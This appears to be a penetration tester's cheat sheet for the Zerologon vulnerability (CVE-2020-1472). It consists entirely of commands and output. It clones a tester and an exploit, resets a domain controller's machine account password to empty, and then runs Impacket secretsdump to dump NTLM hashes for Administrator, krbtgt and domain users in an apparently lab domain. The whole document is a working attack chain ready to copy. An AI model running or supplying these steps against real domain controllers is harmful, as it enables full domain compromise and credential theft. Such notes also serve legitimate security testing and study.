git clone https://github.com/SecuraBV/CVE-2020-1472.git
pip install -r requirements.txt
$ python3 zerologon_tester.py DC2016 10.10.10.10
Performing authentication attempts...
=============================================================================
Success! DC can be fully compromised by a Zerologon attack.
Tip: for finding the computer name, use: rdesktop -u ’’ IP
git clone https://github.com/dirkjanm/CVE-2020-1472.git
$ python3 cve-2020-1472-exploit.py DC2016 10.10.10.10
Performing authentication attempts...
=========================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
Dump using ’no-pass’ flag and computer account
$ secretsdump.py DC2016\$@10.10.10.10 -no-pass -just-dc
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
offsec.nl\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\janedo:1110:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\tokio:1111:aad3b435b51404eeaad3b435b51404ee:b5165f7ba9b2b1a41245a1e91c48b3a9:::
[...]
[*] Cleaning up...
Or dump with empty hash
$ secretsdump.py DC2016\$@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
offsec.nl\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\janedo:1110:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\tokio:1111:aad3b435b51404eeaad3b435b51404ee:b5165f7ba9b2b1a41245a1e91c48b3a9:::
[..SNIP...]
[*] Cleaning up...